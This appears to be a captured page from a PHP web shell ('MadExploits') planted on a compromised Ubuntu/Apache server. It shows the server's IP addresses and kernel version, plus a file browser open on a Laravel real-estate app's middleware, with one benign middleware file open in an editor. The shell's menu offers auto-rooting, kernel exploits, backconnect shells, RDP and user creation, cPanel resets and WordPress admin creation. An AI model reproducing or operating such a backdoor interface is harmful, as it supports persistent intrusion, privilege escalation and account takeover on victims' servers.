Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.230.96
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
app /
Http /
Middleware /
[ HOME SHELL ]
Name
Size
Permission
Action
AdminAccess.php
971
B
-rwxr-xr-x
Authenticate.php
577
B
-rwxr-xr-x
EncryptCookies.php
307
B
-rwxr-xr-x
IsAdmin.php
776
B
-rwxr-xr-x
PreventRequestsDuringMaintenan...
366
B
-rwxr-xr-x
RedirectIfAuthenticated.php
1018
B
-rwxr-xr-x
StoreLastPage.php
477
B
-rwxr-xr-x
TrimStrings.php
381
B
-rwxr-xr-x
TrustHosts.php
379
B
-rwxr-xr-x
TrustProxies.php
649
B
-rwxr-xr-x
ValidateSignature.php
460
B
-rwxr-xr-x
VerifyCsrfToken.php
310
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RedirectIfAuthenticated.php
<?php namespace App\Http\Middleware; use App\Providers\RouteServiceProvider; use Closure; use Illuminate\Http\Request; use Illuminate\Support\Facades\Auth; use Symfony\Component\HttpFoundation\Response; class RedirectIfAuthenticated { /** * Handle an incoming request. * * @param \Closure(\Illuminate\Http\Request): (\Symfony\Component\HttpFoundation\Response) $next */ public function handle($request, Closure $next, $guard = null) { if (Auth::guard($guard)->check()) { return redirect()->route('admin.dashboard'); // Adjust route as needed } return $next($request); } /* public function handle(Request $request, Closure $next, string ...$guards): Response { $guards = empty($guards) ? [null] : $guards; foreach ($guards as $guard) { if (Auth::guard($guard)->check()) { return redirect(RouteServiceProvider::HOME); } } return $next($request); }*/ }
Close